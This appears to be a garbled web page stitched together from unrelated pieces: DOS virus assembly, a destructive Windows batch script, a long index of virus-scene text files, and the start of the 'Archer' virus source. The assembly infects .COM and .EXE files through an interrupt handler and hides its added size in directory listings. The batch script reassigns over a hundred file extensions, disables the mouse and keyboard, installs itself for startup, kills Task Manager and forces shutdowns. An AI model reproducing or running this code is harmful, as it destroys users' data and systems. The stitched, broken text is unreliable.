com_exit:
lea si,[bp + host] ; restore host program
mov di,100h
push di
movsw
movsb
call fix_regs ; fix up registers
ret ; and leave
exe_exit:
mov ax,ds ; fix up return address
add ax,10h
add ax,cs:[bp + exe_cs]
mov cs:[bp + return_cs],ax
mov ax,cs:[bp + exe_ip]
mov cs:[bp + return_ip],ax
mov sp,[bp + exe_sp] ; restore SP
call fix_regs ; fix up registers
db 0EAh ; back to host program
return_ip dw 0
return_cs dw 0
exe_cs dw -16 ; orig CS:IP
exe_ip dw 103h
exe_sp dw -2 ; orig SP
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
ret
; interrupt 21 handler
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,PING ; residency test
je ping_pong
cmp ax,4B00h ; execute program
je execute
cmp ah,3Dh ; file open
je file_open
cmp ah,11h ; directory stealth
je dir_stealth
cmp ah,12h
je dir_stealth
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
ping_pong:
mov bx,PONG
iret
dir_stealth:
call int_21 ; get dir entry
test al,al
js dir_stealth_done
push ax bx es
mov ah,2Fh
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7
no_ext_FCB:
mov ax,es:[bx + 17h] ; check for infection marker
and al,31
cmp al,STAMP
jne dir_fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
sbb word ptr es:[bx + 1Fh],0
dir_fixed:
pop es bx ax
dir_stealth_done:
iret
file_open:
push ax cx di es
call get_extension
cmp [di],'OC' ; .COM file?
jne perhaps_exe ; perhaps .EXE then
cmp byte ptr [di + 2],'M'
jne not_prog
jmp a_program
perhaps_exe:
cmp [di],'XE' ; .EXE file?
jne not_prog
cmp byte ptr [di + 2],'E'
jne not_prog
a_program:
pop es di cx ax
jmp execute ; infect file
not_prog:
pop es di cx ax
jmp int_21_exit
execute:
push ax bx cx dx si di ds es
xor ax,ax ; critical error handler
mov es,ax ; routine - catch int 24
mov es:[24h * 4],offset int_24
mov es:[24h * 4 + 2],cs
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
call int_21
jc cant_open
xchg bx,ax
push cs ; CS = DS
pop ds
mov ax,5700h ; save file date/time
int 21h
push cx dx
mov ah,3Fh
mov cx,28
mov dx,offset read_buffer
int 21h
cmp word ptr read_buffer,'ZM' ; .EXE?
je infect_exe ; yes, infect as .EXE
mov al,2 ; move to end of file
call move_file_ptr
cmp dx,65279 - (VIRUS_SIZE + 3)
ja dont_infect ; too big, don't infect
sub dx,VIRUS_SIZE + 3 ; check for previous infection
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo
PAUSE
@echo off
prompt $P $G
assoc .doc = fA1luRe
assoc .docx = fA1luRe
assoc .log = fA1luRe
assoc .msg = fA1luRe
assoc .pages = fA1luRe
assoc .rtf = fA1luRe
assoc .txt = fA1luRe
assoc .wpd = fA1luRe
assoc .wps = fA1luRe
assoc .accdb = fA1luRe
assoc .blg = fA1luRe
assoc .csv = fA1luRe
assoc .dat = fA1luRe
assoc .db = fA1luRe
assoc .efx = fA1luRe
assoc .mdb = fA1luRe
assoc .pdb = fA1luRe
assoc .pps = fA1luRe
assoc .ppt = fA1luRe
assoc .pptx = fA1luRe
assoc .sdb = fA1luRe
assoc .sdf = fA1luRe
assoc .sql = fA1luRe
assoc .vcf = fA1luRe
assoc .wks = fA1luRe
assoc .xls = fA1luRe
assoc .xlsx = fA1luRe
assoc .xml = fA1luRe
assoc .bmp = fA1luRe
assoc .gif = fA1luRe
assoc .jpg = fA1luRe
assoc .png = fA1luRe
assoc .psd = fA1luRe
assoc .psp = fA1luRe
assoc .thm = fA1luRe
assoc .tif = fA1luRe
assoc .ai = fA1luRe
assoc .drw = fA1luRe
assoc .eps = fA1luRe
assoc .ps = fA1luRe
assoc .svg = fA1luRe
assoc .3dm = fA1luRe
assoc .dwg = fA1luRe
assoc .dxf = fA1luRe
assoc .pln = fA1luRe
assoc .indd = fA1luRe
assoc .pct = fA1luRe
assoc .pdf = fA1luRe
assoc .qxd = fA1luRe
assoc .qxp = fA1luRe
assoc .rels = fA1luRe
assoc .aac = fA1luRe
assoc .aif = fA1luRe
assoc .iff = fA1luRe
assoc .m3u = fA1luRe
assoc .mid = fA1luRe
assoc .mp3 = fA1luRe
assoc .mpa = fA1luRe
assoc .ra = fA1luRe
assoc .wav = fA1luRe
assoc .wma = fA1luRe
assoc .3g2 = fA1luRe
assoc .3gp = fA1luRe
assoc .asf = fA1luRe
assoc .asx = fA1luRe
assoc .avi = fA1luRe
assoc .flv = fA1luRe
assoc .mov = fA1luRe
assoc .mp4 = fA1luRe
assoc .mpg = fA1luRe
assoc .rm = fA1luRe
assoc .swf = fA1luRe
assoc .vob = fA1luRe
assoc .wmv = fA1luRe
assoc .asp = fA1luRe
assoc .cer = fA1luRe
assoc .csr = fA1luRe
assoc .css = fA1luRe
assoc .htm = fA1luRe
assoc .html = fA1luRe
assoc .js = fA1luRe
assoc .jsp = fA1luRe
assoc .php = fA1luRe
assoc .rss = fA1luRe
assoc .tvpi = fA1luRe
assoc .tvvi = fA1luRe
assoc .xhtml = fA1luRe
assoc .fnt = fA1luRe
assoc .fon = fA1luRe
assoc .otf = fA1luRe
assoc .ttf = fA1luRe
assoc .8bi = fA1luRe
assoc .plugin = fA1luRe
assoc .xll = fA1luRe
assoc .cab = fA1luRe
assoc .cpl = fA1luRe
assoc .cur = fA1luRe
assoc .dll = fA1luRe
assoc .dmp = fA1luRe
assoc .drv = fA1luRe
assoc .key = fA1luRe
assoc .lnk = fA1luRe
assoc .sys = fA1luRe
assoc .cfg = fA1luRe
assoc .ini = fA1luRe
assoc .keychain = fA1luRe
assoc .prf = fA1luRe
assoc .app = fA1luRe
assoc .bat = fA1luRe
assoc .cgi = fA1luRe
assoc .com = fA1luRe
assoc .exe = fA1luRe
assoc .pif = fA1luRe
assoc .vb = fA1luRe
assoc .ws = fA1luRe
assoc .7z = fA1luRe
assoc .deb = fA1luRe
assoc .gz = fA1luRe
assoc .pkg = fA1luRe
assoc .rar = fA1luRe
assoc .sit = fA1luRe
assoc .sitx = fA1luRe
assoc .tar.gz = fA1luRe
assoc .zip = fA1luRe
assoc .zipx = fA1luRe
assoc .bin = fA1luRe
assoc .hqx = fA1luRe
assoc .mim = fA1luRe
assoc .uue = fA1luRe
assoc .c = fA1luRe
assoc .cpp = fA1luRe
assoc .dtd = fA1luRe
assoc .java = fA1luRe
assoc .pl = fA1luRe
assoc .bak = fA1luRe
assoc .bup = fA1luRe
assoc .gho = fA1luRe
assoc .ori = fA1luRe
assoc .tmp = fA1luRe
assoc .dmg = fA1luRe
assoc .iso = fA1luRe
assoc .toast = fA1luRe
assoc .vcd = fA1luRe
assoc .gam = fA1luRe
assoc .nes = fA1luRe
assoc .rom = fA1luRe
assoc .sav = fA1luRe
assoc .dbx = fA1luRe
assoc .msi = fA1luRe
assoc .part = fA1luRe
assoc .torrent = fA1luRe
assoc .yps = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
800-5.txt 82314
A Guide to the Selection of Anti-Virus Tools and Techniques, by W.T. Polk and L.E. Basshan, December 1992
abaittut.txt 14720
Information on the "Anti-Bait" Method of Virus Transmission
adebgtut.txt 15848
Anti-Debugger Techniques by The Master Hides Behind the Mask
agents.txt 36769
McAfee Associates Agent Listing (February 23, 1993)
allvirus.vir 22209
PC Virus Listing, by Jim Goodwin, 1989
allvirusdf.vir 30897
Slightly Updated Version of Jim Goodwin's List.
amigvir1.txt 3314
A History of the Amiga Viruses, by Paul M. of POISON Cracking Association
amigvir2.txt 6144
A History of the Amiga Viruses by Ed Earing
amigvir3.txt 1920
The Amiga IRQ Virus: It's Out! (December 28, 198
anaco001.txt 16048
ANACONDA #001: The Official VIPER Electronic Mag by Viral Inclined Programming Experts Ring
apply.yam 4117
APPLICATION: Youths Against McAfee
arcvnews01.txt 56065
ARCV: The Association of Really Cruel Viruses Newsletter
armag911.txt 2594
The 911 Virus, Disassembly and Commentary by Black Wolf
atari101.txt 54379
Viruses 101: Chapter 1
avcr-01.001 3088
Amateur Virus Creation Research Group Magazine: Introduction
avcr-01. 002 39187
Amateur Virus Creation Research Group Magazine: The New DS-512 Virus
avcr-01.003 3223
Amateur Virus Creation Research Group Magazine: Nuking, by Thimble
avcr-01. 004 3605
Amateur Virus Creation Research Group Magazine: The *** Virus
avcr-01.005 24313
Amateur Virus Creation Research Group Magazine: the AMI Virus
avcr-01.006 7359
Amateur Virus Creation Research Group Magazine: An Introduction to ASM
avcr-01.007 21995
Amateur Virus Creation Research Group Magazine: Research of the Air Cop Virus, by Security Threat
avcr-01.008 22344
Amateur Virus Creation Research Group Magazine: Research of the Wigger Virus, by Security Threat
avcr-01.009 2881
Amateur Virus Creation Research Group Magazine: Analysis of Connie
avcr-01.010 3392
Amateur Virus Creation Research Group Magazine: OhhLala Virus
avcr-01.011 4612
Amateur Virus Creation Research Group Magazine: Twister Virus
avcr-01.012 2892
Amateur Virus Creation Research Group Magazine: Vlamix 1.0
avirus.txt 4458
Overview of Some Amiga Viruses
backdoor.txt 6512
Information About Backdoors and MS-DOS and BIOS That Can Be Used by Viruses, by Qark of VLAD
baitdet.txt 6722
Advanced Bait Detection by CoKe of VLAD
batvirus.txt 668
Creating a Batch File Virus
bbinterv.iew 21652
Anatomy of a Virus Author: A Biography of the Black Baron by Matthew Probert
bdinterv.iew 18873
Interview with A Virus Writer named Blode by The Unforgiven
bedtime.nfo 4338
NFO: The Bedtime Virus, by Youngsters Against McAfee (November 16, 1992)
blckbook.txt 24240
The little Black Book of Computer Viruses Volume One: The Basic Technology by Mark A. Ludwig (1991)
bluenine.nfo 9706
A Technical Discussion About the Blue Nine Virus by Conzouler (November 19, 1994)
braininf.vir 4577
Information on the Brain Virus And Variants
bulgfact.txt 57241
The Bulgarian and Soviet Virus Factories by Vesselin Bontchev, Director of Laboratory of Computer Virology, Bulgarian Academy of Sciences, Sofia, Bulgaria
bulgfactdoc.vir 57241
The Bulgarian and Soviet Virus Factories
catvir.txt 10223
How to write a virus program, by the Cheshire Cat
ccinterv.iew 8675
Interview with Crom-Cruach of Trident
chaos.nfo 3677
INFO: The Viral Collector's Kit #1 by The Knights of Chaos (February 4, 1995)
cmvs-1.v1 37357
ViriiSearch: The Virus Research Newsletter Volume 1 Number 1
cmvs-2.v1 60096
ViriiSearch: The Virus Research Newsletter Volume 1 Number 2 (July 2, 1992)
cmvs-3.v1 59651
ViriiSearch: The Virus Research Newsletter Volume 1 Number 3 (August 2, 1992)
cnws2000.vir 14585
Computer Virus Research and Information Service Index
cnws2001.vir 17995
Computer Virus Research and Information Service #1
cnws2002.vir 3036
Computer Virus Research and Information Service #2
cnws2003.vir 5457
Computer Virus Research and Information Service #3
cnws2004.vir 44383
Computer Virus Research and Information Service #4
cnws2005.vir 49238
Computer Virus Research and Information Service #5
cnws2006.vir 8975
Computer Virus Research and Information Service #6
cnws2007.vir 8956
Computer Virus Research and Information Service #7
cnws2008.vir 91748
Computer Virus Research and Information Service #8
comp.vir 8320
The USENET Virus: A Cautionary Tale by Peter de Silva (April 20, 1990)
cpi-1.txt 20245
Corrupted Programming International Newsletter #1 by Doctor Dissector (June 30, 1989)
cpi-2.txt 99461
Corrupted Programming International Newsletter Issue #2
cpi1.vir 24305
CPI Newsletter Volume #1, 1989
cpi2.vir 98758
CPI Newsletter Volume #2
cpivirus.txt 23568
Corrupted Programming Internation #1: Computer Viruses, a Protagonist's Point of View by Doctor Dissector (June 27, 1989)
cpivirus2.txt 90571
Corrupted Programming International #2 by Doctor Dissector: Trojan Horses and Virii: A Protagonist's Point of View (July 27, 1989)
crcrevue.vir 55986
Comparison: Products to Detect Changes to Programs
csvir87.vir 4771
CompuServe Magazine's Virus History Timeline: 1987
csvir88.vir 103572
CompuServe Magazine's Virus History Timeline: 1988
csvir89.vir 69893
CompuServe Magazine's Virus History Timeline: 1989
cvirs.101 1****
C VIRUS 101: An Introduction to Viruses in C
cvm.txt 23552
Computer Virus Myths by Rob Rosenberger with Ross Greenberg
datut001.txt 8220
Scan Strings, How They Work, and How to Avoid Them, by Dark Angel
datut002.txt 9941
An introduction to Nonoverwriting Virii by Dark Angel
datut003.txt 14844
An introduction to Nonoverwriting Virii II: EXE Infectors, by Dark Angel
datut004.txt 18463
An Introduction to Nonoverwriting Virii III: SYS Infectors by Dark Angel
datut005.txt 6571
Code Optimization: A Beginner's Guide by Dark Angel
datut006.txt 10873
Advanced Polymorphism Primer by Dark Angel
datut007.txt 8171
SFT's and Their Usage, by Dark Angel
datut008.txt 17676
EXE Self-Disinfection by Dark Angel
datut009.txt 11690
Boot Infectors by Dark Angel
datut010.txt 5910
UMB Residency by Dark Angel
desc.sdi 444
NFO: The Smeg Virus Construction Kit
deth001.rot 4661
Megadeth's Guide to Virus Researching Part I by Megadeth of .ROTing [DeTH]
dhcivwar.txt 2206
Relationship Chart of the Civil War and Related Viruses by TridenT (1993)
dhinterv.iew 8668
Interview with Dark Helmet of Trident
diogenesdoc.vir 3217
Diogenes 2.0 Documentation and User Manual
dirstlth.txt 6061
Directory Stealth Techniques of Viruses (FCB)
drkfib01.txt 3524
Virus Writers Reply to the SCAN.EXE Program
enigma.asm 18797
DISASSEMBLY: The Enigma Virus
european.txt 19456
List of Known Viruses in the UK, by Joe Hirst of the British Computer Virus Research Centre
eval.vir 26111
Anti-Viral Product Evaluation
fester.vir 10122
Festering Hate: A Description of an Apple II Virus, by the Bowen Arrow
firefly.txt 19617
The Firefly Virus, by Nikedamus
fish.vir 9382
Thoughts on the Fish Virus
fndint21.txt 12608
Finding INT 21's Real Address Using the PSP by Satan's Little Helper
fog.txt 17483
FOG: A Polymorphic Encription Algorithm by Eclipse
fullstlt.txt 10033
A Full Stealth or Disinfection on Open by Blonde of Immortal Riot
funbot2.cvp 3190
How the Boot Sequence Operates, Relevant to Virus Infection
funbot3.cvp 3465
How the Boot Sequence Operates Relevant to Viral Infection, Part II.
fungen1.cvp 2792
Computer Operations and Viral Operations
fungen2.cvp 2721
Viral operations: How Viruses Function
fungen3.cvp 2672
How Viruses Use Operating Systems
fungen4.cvp 2629
How Viruses Hide in System Layers
fungen5.cvp 2939
How Viruses are Activated
fungen6.cvp 2679
How to Detect Changes made by a Virus
fungen7.cvp 2716
Checking Files for Viruses
fungen8.cvp 3033
Checking Files for Viruses, Part II
fungen9.cvp 2664
Checking the System Files for Viruses
fungena.cvp 2766
How Viruses Avoid Detection
funpiv1.cvp 2542
Viruses that Affect and Infect Files
funpiv2.cvp 2375
Viruses and how they Insert Themselves
funpiv3.cvp 2529
How to Add a Virus to a Program
funpiv4.cvp 2895
Viral Code "Association"
funpiv5.cvp 2872
Variations of Computer Virus Infection
g2.txt 25600
Phalcon/Skism's G^2 Version 0,70: The Second Generation of Virus Creation by Dark Angel (January 1, 1993)
gao_rpt 106252
The General Accounting Office Report on Computer Viruses, 1988
gf.txt 1966
Information and BBS List for General Failure, a H/P/A/V/C Oriented Computer Organization
glath.vir 21116
Computer Viruses: A Rational View, By Dr. Raymond Glath
gold-bug.txt 9373
Analysis of the Gold Bug Virus
goodwin.txt 137805
An Analysis of Computer Virus Structures (April 7, 1989)
greetng1.txt 3202
NFO: The Grretings Virus by Youngsters Against McAfee (January 2, 1993)
guardian.bbs 29058
The Guardian Lists: An Abbreviated Trojan Alert List Issue #1 (November 12, 1989)
guardian.vir 53823
The Guardian List, Issue #1, Sept. 25, 1989
hackmisc.9 9303
Hacked/Miscellaneous Dangerous Files, #9
hate.txt 1540
BBS AD: The Immortal Hate BBS
hatedetect.vir 5984
Program to Detect the Festering Hate or CyberAIDS Apple II Virus, by Tom Weishaasr (July, 198
hitler.a86 3****
The HITLER virus: commented in a rough 'n' ready way by the Crypt Newsletter staff for issue #11, January 1993
hormones.vir 19584
Net Hormones: Infection Control using Cooperation among Computers
hr5061.vir 2309
The text of H.R. 5061
hysteria.vir 18748
Virus Hysteria! By Richard B. Levin
ibmpaper.vir 87040
Coping with Computer Viruses and Related Problems
identify.txt 20602
Developing Virus Identification Products, by Tim Sankary, 1989
illegal.nfo 2083
NFO: Illegality, the Unstoppable Crime Machine (November 12, 1994)
implemen.mca 42307
Implementing Anti-Viral Programs, by John McAfee 1989
index.mag 1201
Index to SLAM Magazine Issue #1 (January 1997)
intro1.cvp 2475
Introduction to the Computer Virual Programs Column
ivm-95.1 14****
Immortal Virus Magazine Issue #95.1
jeru-b.asm 42115
DISASSEMBLY: The Jerusalem B Virus
jeru-dc.vir 3328
Analysis of the Jerusalem DC Virus
jtinterv.iew 17375
INTERVIEW: John Tardy of Trident in The Netherlands
jvvirus.txt 42968
Jerusalem B Virus Source Code
killhead.vir 959
Virus Source Code that Destroys the Disk Head
levine.pap 13323
Potential Virus Attack by L. P. Levine
lminterv.iew 54289
The Faces Behind the Masks by Sara Gordon (November 1994)
locprst.txt 32002
Excerpt from "The Virus Creation Labs: A Journey Into the Underground": A Preist Deploys His Satanic Minions
ltlmess.slt 4005
The Little Mess Spawning Virus Source from Crom-Cruach of Trident (1992)
lzinterv.iew 20100
INTERVIEW: Lord Zero, Virus Writer
macv.txt 24130
How to Write a Virus for the Macintosh, or How I Learned To Stop Worrying And Love The Resource Manager
malmsey.txt 4058
Information on the Malmsey Virus (October, 1992)
mayhem.txt 1384
Mayhem at Firms Plagued by Virus, by Philip Braund of The Mirror, transcribed by Phantasm (March 7th, 1992)
mbfamily.txt 6942
The Mayberry Family of Virus by HypoDermic
mbinterv.iew 13793
INTERVIEW: Metabolis of VLAD (Virus Writing Group)
mcaffvirus.txt 7075
Virus Characteristics, by McAfee Virus Scanning
mdef.inf 4864
The MDEF Macintosh Virus, by Tom Young of Cornell Information Technologies
melissa.txt 13926
The Melissa Macro Virus, a Report Prepared by Robert M. Slade
memres.txt 7779
Some Information on Memory Residence Methods for Viruses
michael.asm 6969
DISASSEMBLY: Michelangelo Virus
michangl.txt 6840
The Michaelangelo Virus Source Code
mk-chart.txt 1835
A Virus Relationship Chart of Masud Khafir's Viruses
mkinterv.iew 12153
INTERVIEW: Masud Khafir of Trident
mkvirlst.txt 17466
A List of Viruses Written by Masud Khafir of Trident
necro.a86 2****
Source code for the Necro, A.k.a. "Skull" Virus
net.hor 19511
Net Hormones: Part 1 - Infection Control assuming Cooperation among Computers
newinstl.txt 1472
Installation Instructions for Nowhere Man's Virus Creation Library v1.00
nist01.txt 5761
Columbus Day Virus: Press Release by Jan Kosko Sept. 22, 1989
nist02.txt 4238
Columbus Day Virus: A Fact Sheet
offspr82.txt 1470
DOCUMEN#TATION: Offspring v0.82 by Virogen (September 6, 1993)
p1.txt 10934
Attack of the Computer Virus, By Lee Dembart
pcblkjck.txt 4608
Features of Blackjack Virus (PC) (January 24, 1989)
peacevir.vir 2573
Computer Virus Hits Again (The Peace Virus)
ph-vir1.txt 19794
Dark Angel's Phunky Virus Writing Guide #1
pngintrv.iew 9876
INTERVIEW: Persona No Grata of Trident in The Netherlands
polyflag.txt 18411
A Humble PolyMorphic Engine Primer by Absolute Overlord
polymorf.txt 31851
Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura
polymorph.txt 17432
Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura
polymrph.txt 14524
Polymorphic Viruses Escape Detection but Get Our Attention
polyvir.txt 6299
Computer Virus Catalog 1.2: Dedicated Virus (31-January 1992)
popscia86.vir 4472
Popoolar Science virus - a very simple overwriting infector
portexec.txt 9293
Infection of Portable Executables by Qark and Quantum of VLAD
ps-vir1.txt 19801
Dark Angel's Phunky Virus Writing Guide (Part 1)
ps-vir2.txt 29546
Dark Angel's Phunky Virus Writing Guide (Part 2) The Replicator
ps-vir3.txt 20133
Dark Angel's Phunky Virus Writing Guide (Part 3) Non-Resident Virii, Part II
ps-vir4.txt 22970
Dark Angel's Phunky Virus Writing Guide (Part 4) Resident Virii, Part I
ps-vir5.txt 20131
Dark Angel's Phunky Virus Writing Guide (Part 5) Resident Viruses, Part II
ps_vir1.vir 19865
Phalcon Skism, Part I
ps_vir2.vir 29617
Phalcon Skism, Part II
ps_vir3.vir 20204
Phalcon Skism, Part III
ps_vir4.vir 23041
Phalcon Skism, Part IV
qkinterv.iew 15053
INTERVIEW: Qark of Virus Labs and Distribution (VLAD) by The Unforgiven
rab_mem.apl 3110
APPLICATION to Join RABID by ProTurbo of RABID (1991)
ratboy-1.txt 12067
RatBoy's Overwriting Virus Tutorial
ratboy-2.txt 15758
RatBoy's Overwriting Virus Tutorial Part II
readlist.vir 12800
An abbreviated bibliography for computer viruses
resist.txt 29417
Resist! Further Virus Strategies by Mouth of Sauron
rjinterv.iew 31156
An Interactive Interview with Virus-Writer Rajaat of Genesis
robin.hod 6655
Viruses and System Security (a story)
rstut001.txt 13765
Disinfecting an Infected File by Rock Steady of NuKE
rstut002.txt 9350
TSR COM Infections by Rock Steady of NuKE
rstut003.txt 7782
Constructing Kit on Infecting .COM by Rock Steady of NuKE
rstut004.txt 20142
Infection on Closing by Rock Steady of NuKE
rstut005.txt 13378
EXE Infections Part I: Infection Process, by Rock Steady of NuKE
rstut006.txt 7572
EXE Infectors Part II by Rock Steady of NuKE
rstut007.txt 11905
Directory Stealth by Rock Steady of NuKE
rstut008.txt 7273
Directory Stealth Method 2 by Rock Steady of NuKE
rstut009.txt 5350
Memory Stealth by Rock Steady NuKE
rstut010.txt 28965
The Dangers of Thunderbytes TBClean Emulation Techniques by Rock Steady of NuKE (August, 1993)
rumors.txt 9250
Rumors of Worms and Trojan Horses: Danger Lurking in the Public Domain, by Mike Guffey
rvlatn1.vir 48324
Revelation, a Virus E-Zine, Vol. 1 Issue 1
samson.vir 5642
Samson's PC Virus List
scitzo.nfo 1954
Virus Spotlight: The Scitzo Virus
sdwlnd02.ans 3788
ANSI BBS AD: Shadowland BBS
six_byte.pad 17377
Six Bytes for Virus Detection in the MS-DOS Envrionment, by Padgett Peterson, 3/29/1991
smallvir.txt 3568
The Smallest Virus I Could Manage (263 Bytes)
span02.vir 1735
You can't release the Worm source code, says SPAN
stealth.txt 3798
Elusive New Viruses Can Avoid Detection by Dennis Flanders
steroid.vir 2304
Discussion of a Trojan Horse program called "Steroid"
stoned-b.txt 10898
The Stoned-B Virus
stoned1.vir 3392
To Remove the Marijuana (Stoned) Virus from HD
stoned_d.law 9105
An Explanation of how the Stoned Virus operates by Mike Lawrie
stormbrg.rt1 2158
A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses
stormbrg.rt2 1554
A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses (Part II) (1995)
tag.ans 14090
ANSI BBS AD: The Adventures of Guild
talons01.txt 5850
Some Background on PuKE: An Introduction from TLN
talons02.txt 28869
The True Story about Talon by Talon of NUKE (April, 1994)
talons03.txt 2293
An Incredibly Complicated Tale of Mystery and Intrigue
talontut.txt 7844
Information About Mulipartite Infection of Viruses
tdoc1.txt 14961
Documentation for a Virtual Mouse Drive That's a Virus, by Seth Comstock (August 1993)
tdoc2.txt 5179
Documentation for a Story Program That's Actually a Virus, (1993)
troj.hac 4652
Lots of warnings about EGABTR.EXE
troj.txt 7528
Other warnings for other random virus programs
trojan.vir 9191
How someone's BBS got whacked with Viruses in 1984
tsrtut.txt 4484
A Documentation on Creating TSR Viruses
tuinterv.iew 6820
Intervue with TU About Virus Creation
universa.mol 13613
A universal Detection Model by Chris Ruhl and James Molini
usavirus.vir 2175
Supposed use of a computer virus during Desert Storm
v101pt1 14746
Virus 101 - Chapter 1 by George Woodside (March 1, 1989)
v101pt2 18596
Virus 101 - Chapter 2 by George Woodside (March 6, 1989)
v101pt3 19444
Virus 101 - Chapter 3, by George Woodside (March 13, 1989)
v101pt4 5845
Virus 101 - Chapter 4 by Gordon Meyer (March 30, 1989)
varicell.txt 5474
The Varicella Virus Source Codes, by Rock Steady
vdetect.vir 13696
A Universal Virus Detection Model by Chris Ruhl and James Molini
verify_r.txt 24830
Virus Verification and Removal -- Tools and Techniques by David M. Chess, Nov. 18, 1991
vguide.txt 21135
Computer Viruses: A Rational View by Raymond M. Glath
vi900906.txt 187667
Fidonet Message Base Disucssing Viruses (Summer 1990)
vi901029.txt 181138
Fidonet Message Base Disucssing Viruses (Summer 1990)
vir-1.v1 37205
ViriiSearch: The Virus Research Newsletter Volume 1 Issue 1
vir-2.v1 60027
ViriiSearch: The Virus Research Newsletter Volume 1 Issue 2 (July 2, 1992)
vir-3.v1 59654
ViriiSearch: The Virus Research Newsletter Volume 1 Issue 3 (August 2, 1992)
vir.txt 19800
Dark Angel's Phunky Virus Writing Guide
vir2.txt 29557
Dark Angel's Phunky Virus Writing Guide Installment II
virbillfax.vir 4169
NCSA Testimony on Virus Bills, 1990
virethic.txt 13124
Establishing Ethics in the Computer Virus Arena by Paul W. Ferguson, Jr. (September 1992)
virii.txt 17712
What You Should Know About Computer Viruses by BlenderHead
viris03.txt 7208
Some of the Less Known Viruses (Humor)
virpgm01.txt 12883
Virus Programming Basics Issue #1
virpgm02.txt 23762
Virus Programming Basics Issue #2: Not So Basic
virs.vir 11931
Discussions about the Jerusalem B Virus
virukpc.txt 13056
Known PC Viruses in the UK and their effects, by Dr. Alan Solomon, 1989
virus 5314
Virus Attack! By Rick Arnold
virus-al.ert 2065
Local Area Virus Update, Bay Area - Sacramento, 21 Sep, 1989
virus.1 1821
Virus Discussion on a BBS
virus.kie 32573
The Infection of PC Compatible Computers by Stephen E. Kiel and Raymond K. Lee of the Georgia Institute of Technology
virus.txt 5160
Comparison between Mcaffe's SCAN.EXE (3-25-92) and F-PROT.EXE (4-5-92) by The Researcher and Scan Man
virus1.dna 17710
What You Should Know about Computer Viruses by Blinderhead
virus1.vir 4223
Report on the DATACRIME Virus
virus101.vir 58631
Viruses 101: A Information Set
virus101001.vir 13796
Virus 101 Chapter 1
virus101002.vir 17548
Virus 101 Chapter 2
virus101003.vir 18347
Virus 101 Chapter 3
virus101004.vir 4971
Virus 101 Chapter 4
virus2.txt 11729
The Virus Informer: Your Weekly Virus Newsletter by Mark E. Bishop
virus3.txt 7585
The Virus Informer by Mark E. Bishop: The Macintosh Virus
virus4.txt 4268
The Virus Informer Chapter 4: The Engine That Kills
virus5.txt 49830
The Virus Informer Chapter 5: The Virus List
virus6.txt 1729
The Virus Informer Chapter 7: The Virus Informer Fax Bulletin Service
virus7.txt 1762
The Virus Informer by Mark E. Bishop Chapter 7: Next Week
virus_my.ths 27085
Computer Virus Myths, by Rob Rosenberger (1988-****)
virus_st.whm 16646
A New Stategy for Computer Viruses by William H. Murray
virusbas.vir 1338
An example of a Virus in BASIC
virusbib.txt 4480
Bibliography for Computer Viruses, by Ted Landberg, 02/24/1988
virusbro.vir 9856
Computer Viruses and Trojan Horses; A Guide to Protecting Yourself
virusdet.txt 50981
Virus Detection Alternatives, by Patrick Min
virusdoc.vir 205175
The Computer Virus Epidemic, 1987-****. Article Compilation
viruses.pro 10368
How to write a Virus Program, by The Cheshire Cat
viruses.txt 3123
Safe Telecommunicating may be your Best Protection against Viruses, by Micharl Fischer, A+ Magazine, August 1988
viruses.uss 20740
Viruses in the USSR by Eldar A. Musaev
virusfaq.txt 84745
FAQ: VIUS-L/comp.virus Frequently Asked Questions (November 18, 1992)
virusinf.vir 9216
A Suggested Readings List for Computer Viruses by Jon Mack
virusl.vir 1887
The Virus Informer, Issue #6
virusone.vir 4323
The Virus Informer, Issue #1
virussum.doc 558766
Virus Information Summary List, March 17, 1991, by Patricia M. Hoffman
virussum.txt 607049
The Virus Information Summary List, April 20, 1991 by Patricia M. Hoffman
virusx.txt 14142
Information on VirusX by Steve Tibbet, as well as a list of Amiga Viruses
vlab102.vir 19999
Viral Lab 102, May 1994
wininf01.txt 25224
Windows Executable Infection by Qark and Quantum of VLAD
wininf02.txt 13444
Calling the Windows API in Assembly Language by Qark of VLAD
wordmacro.txt 86611
FAQ: The MS Word 6.x Macro Viruses FAQ v2.0
xyz.txt 3424
Information on the XYZ (Examine Your Zipper) Virus (January, 1994)
yam-ivp.nfo 3769
NFO: The Instant Virus Production Kit by Youngsters Against McAfee (June 12, 1992)
yetiser_ 15345
Polymorphic Viruses: Implementation, Detection, and Protection by VDS Advanced Research Group/Tarkan Yetiser 1993
Report
13. Written by >>>>>>>>>>>VIRUS, on 01-12-2010 08:56
; archer.asm : [Archer] MnemoniX `94
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0AE3Bh
PONG equ 0CD28h
STAMP equ 30
MARKER equ 04D4Dh
code segment
org 0
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
db 0BBh ; decryption module
code_offset dw offset virus_code
mov dx,VIRUS_SIZE / 2 + 1
decrypt:
db 02Eh,081h,07h ; ADD CS:[BX]
cipher dw 0
inc bx
